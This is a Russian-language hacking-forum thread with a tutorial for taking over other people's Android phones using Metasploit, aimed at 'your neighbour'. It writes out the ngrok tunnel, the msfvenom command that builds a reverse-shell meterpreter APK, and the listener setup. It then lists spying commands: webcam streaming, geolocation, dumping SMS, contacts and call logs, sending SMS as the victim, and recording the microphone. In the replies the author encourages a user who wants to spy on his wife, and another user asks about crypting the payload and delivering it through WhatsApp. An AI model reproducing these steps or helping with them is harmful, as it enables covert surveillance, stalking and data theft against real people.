• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Взлом Android смартфона. Metasploit в деле.

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
Привет, хацкер, сегодня я научу тебя взламывать андроид твоей соседки при помощи Metasploit.

c66bb695-21ab-4348-ab06-9e99d100d18d.png


По сути эта статья является небольшим дополнением к прошлой, где я рассказывал, как взломать ПК при помоши Metasploit'a. Прочитать её можно нажав по ссылке. Ну, а если, ты уже прочитал прошлую стаью, то ты уже знаешь, о чём будет идти речь.

Поднимаем tcp соединение:
./ngrok tcp 4444

7449b98b-34df-4514-b33d-faf7d840b0c5.png


5f2e5e33-2798-430a-ad15-431669b8ea23.png


Теперь нам нужно создать пейлоад под систему Android'a:

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19752 R > payload.apk

4953f6b9-e0a6-4636-a41d-6c21aceb0eed.png


Payload готов. Осталось запустить прослушиватель порта на соединения.
Для этого выполняем такие команды (в случае с Ngrok):

Код:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit

d06ac9c9-c64f-4f40-bf13-1061e427f332.png


Теперь, когда вы увидите надпись: "Started reverse TCP handler on...", прослушиватель готов, можем подкинуть жертве наш пейлоад.

1d2e98a4-8d25-4672-8027-8617036f6525.png


Список команд интересных для meterpreter:
  • Просмотр камеры в режиме реального времени:
webcam_stream
  • Узнать текущую геолокацию:
geolocate
  • Дампы: смс, контакты, история звонков:
Код:
dump_sms

dump_calllog

dump_contacts
  • Отправка смс от имени жертвы:
send_sms
  • Запись микрофона:
record_mic
  • Скриншот экрана:
screenshot
  • Блокировка экрана:
wakelock


 

Volobia2500

Новичок
Сообщения
2
Реакции
0
0 руб.
Привет, хацкер, сегодня я научу тебя взламывать андроид твоей соседки при помощи Metasploit.

c66bb695-21ab-4348-ab06-9e99d100d18d.png


По сути эта статья является небольшим дополнением к прошлой, где я рассказывал, как взломать ПК при помоши Metasploit'a. Прочитать её можно нажав по ссылке. Ну, а если, ты уже прочитал прошлую стаью, то ты уже знаешь, о чём будет идти речь.

Поднимаем tcp соединение:
./ngrok tcp 4444

7449b98b-34df-4514-b33d-faf7d840b0c5.png


5f2e5e33-2798-430a-ad15-431669b8ea23.png


Теперь нам нужно создать пейлоад под систему Android'a:

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19752 R > payload.apk

4953f6b9-e0a6-4636-a41d-6c21aceb0eed.png


Payload готов. Осталось запустить прослушиватель порта на соединения.
Для этого выполняем такие команды (в случае с Ngrok):

Код:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit

d06ac9c9-c64f-4f40-bf13-1061e427f332.png


Теперь, когда вы увидите надпись: "Started reverse TCP handler on...", прослушиватель готов, можем подкинуть жертве наш пейлоад.

1d2e98a4-8d25-4672-8027-8617036f6525.png


Список команд интересных для meterpreter:
  • Просмотр камеры в режиме реального времени:
webcam_stream
  • Узнать текущую геолокацию:
geolocate
  • Дампы: смс, контакты, история звонков:
Код:
dump_sms

dump_calllog

dump_contacts
  • Отправка смс от имени жертвы:
send_sms
  • Запись микрофона:
record_mic
  • Скриншот экрана:
screenshot
  • Блокировка экрана:
wakelock


А простой обыватель может такое сделать? Хочу проверить жену, но полный лох в компах и смартах.
 

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
А простой обыватель может такое сделать? Хочу проверить жену, но полный лох в компах и смартах.
Может конечно, главное следовать мануалу. Если будут дополнительные вопросы, обращайтесь в телеграм. @exploit_dar
 

Form

Участник
Сообщения
42
Реакции
29
0 руб.
Пейлоад криптовать нужно? Передачей пейлоада через Ватсапп удастся реализовать сессию?
 
Сверху Снизу